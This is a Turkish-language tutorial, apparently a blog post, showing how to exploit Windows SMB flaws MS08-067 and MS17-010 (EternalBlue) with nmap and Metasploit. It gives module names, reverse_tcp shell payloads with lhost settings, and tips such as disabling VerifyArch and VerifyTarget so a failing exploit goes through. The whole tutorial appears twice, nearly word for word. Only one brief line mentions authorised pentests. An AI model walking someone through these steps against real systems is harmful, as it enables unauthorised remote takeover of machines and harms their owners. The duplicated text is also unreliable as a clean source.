MS08-067:
-Genelde XP makinelerde bulunur. SMB servisi üzerine yazılmış bir exploittir.
-Zafiyetin tespiti için nmap'ın bir scriptini kullanacağız.İlk önce scripti bulmak için
usr/share/nmap/scripts/
yazarak scriptlerin bulunduğu dosyaya geliyoruz.Daha sonra scripti aramak için
ls | grep "ms08"
yazıyoruz.Karşımıza çıkan script ile
nmap --scripts scriptadı ipadresi -p445
yazıyoruz ce sistemin bu zafiyete karşı savunmasız olduğunu gördükten sonra msfconsole'a giriyoruz.
use exploit/windows/smb/ms08_067_netapi
yazdıktan sonra show options diyoruz ve bizden istenilenleri set ediyoruz(rhost)
daha sonra bir payloads seçiyoruz.Benim önerim reverse_tcp payloadı
set payload windows/shell/reverse_tcp
yazdıktan sonra options diyerek payloadın bizden istediği bilgilere bakıyoruz ve onları set ediyoruz.(lhost)
daha sonra exploit/run diyerek exploiti başlatıyoruz.Artık shelldeyiz
Veyahut görseldeki gibi sadece exploit ile devam edebiliriz.Meterpreter'e düştükten sonra shell komutu ile komut satırına inebiliriz.
MS17_010:
WİN7-10 Ve 2008 Microsoft Serverlarda bulunan bir exploittir.MS08'e göre daha büyük bir etki alanına sahiptir.Kısacası MS08'in geliştirilmiş versiyonudur.
MS08'de zafiyetin tespitini göstermiştim.Aynı şekilde MS10'a uyarlayarak yapacaksınız.Direkt exploitleme işlemine geçiyorum.İlk olarak msfconsole'i açıyoruz.
use exploit/windows/smb/ms17_010_eternalblue
show options
dedikten sonra bizden istenilen yerleri set ediyoruz.ve exploiti başlatıyoruz.
Eğer exploit çalışmazsa Verify değerlerini False yapıyoruz.Yani şöyle
set VerifyArch false
set VerifyTarget false
Daha sonra payloadımızı set edelim.
set payload/windows/shell/reverse_tcp
dedikten sonra payloadın bizden istediklerini set ediyoruz(lhost) ve run diyerek çalıştırıyoruz.
Sistem 1-2 defa yeniden başlayabilir tekrar deneyin .Eğer resmi bir pentest işlemi gerçekleştiriyorsanız bunu yetkililere bildirmelisiniz.
Eğer exploit yine çalışmazsa payloadın mimarisinden kaynaklı bir hatadır.Payloadı değiştirin.
Birde söylemeden geçmek istemiyorum.Bu MS17_010 exploitinin geliştirilmiş versiyonu olan MS17_010_PSEXEC exploiti var.
Bu exploit bütün windows işletim sistemlerinde sorunsuz çalışabiliyor.Fakat kullanmamız için bizden herhangi bir smb user'i istiyor.
Ve daha önce bahsettiğim sistemin baştan başlama sorunu ortadan kalkıyor bu exploit ile.Kullanımı aynı sadece smb user i set etmemiz gerekiyor.
Başka Bir Konuda Görüşmek Üzere..
-Genelde XP makinelerde bulunur. SMB servisi üzerine yazılmış bir exploittir.
-Zafiyetin tespiti için nmap'ın bir scriptini kullanacağız.İlk önce scripti bulmak için
usr/share/nmap/scripts/
yazarak scriptlerin bulunduğu dosyaya geliyoruz.Daha sonra scripti aramak için
ls | grep "ms08"
yazıyoruz.Karşımıza çıkan script ile
nmap --scripts scriptadı ipadresi -p445
yazıyoruz ce sistemin bu zafiyete karşı savunmasız olduğunu gördükten sonra msfconsole'a giriyoruz.
use exploit/windows/smb/ms08_067_netapi
yazdıktan sonra show options diyoruz ve bizden istenilenleri set ediyoruz(rhost)
daha sonra bir payloads seçiyoruz.Benim önerim reverse_tcp payloadı
set payload windows/shell/reverse_tcp
yazdıktan sonra options diyerek payloadın bizden istediği bilgilere bakıyoruz ve onları set ediyoruz.(lhost)
daha sonra exploit/run diyerek exploiti başlatıyoruz.Artık shelldeyiz
Veyahut görseldeki gibi sadece exploit ile devam edebiliriz.Meterpreter'e düştükten sonra shell komutu ile komut satırına inebiliriz.
MS17_010:
WİN7-10 Ve 2008 Microsoft Serverlarda bulunan bir exploittir.MS08'e göre daha büyük bir etki alanına sahiptir.Kısacası MS08'in geliştirilmiş versiyonudur.
MS08'de zafiyetin tespitini göstermiştim.Aynı şekilde MS10'a uyarlayarak yapacaksınız.Direkt exploitleme işlemine geçiyorum.İlk olarak msfconsole'i açıyoruz.
use exploit/windows/smb/ms17_010_eternalblue
show options
dedikten sonra bizden istenilen yerleri set ediyoruz.ve exploiti başlatıyoruz.
Eğer exploit çalışmazsa Verify değerlerini False yapıyoruz.Yani şöyle
set VerifyArch false
set VerifyTarget false
Daha sonra payloadımızı set edelim.
set payload/windows/shell/reverse_tcp
dedikten sonra payloadın bizden istediklerini set ediyoruz(lhost) ve run diyerek çalıştırıyoruz.
Sistem 1-2 defa yeniden başlayabilir tekrar deneyin .Eğer resmi bir pentest işlemi gerçekleştiriyorsanız bunu yetkililere bildirmelisiniz.
Eğer exploit yine çalışmazsa payloadın mimarisinden kaynaklı bir hatadır.Payloadı değiştirin.
Birde söylemeden geçmek istemiyorum.Bu MS17_010 exploitinin geliştirilmiş versiyonu olan MS17_010_PSEXEC exploiti var.
Bu exploit bütün windows işletim sistemlerinde sorunsuz çalışabiliyor.Fakat kullanmamız için bizden herhangi bir smb user'i istiyor.
Ve daha önce bahsettiğim sistemin baştan başlama sorunu ortadan kalkıyor bu exploit ile.Kullanımı aynı sadece smb user i set etmemiz gerekiyor.
Başka Bir Konuda Görüşmek Üzere..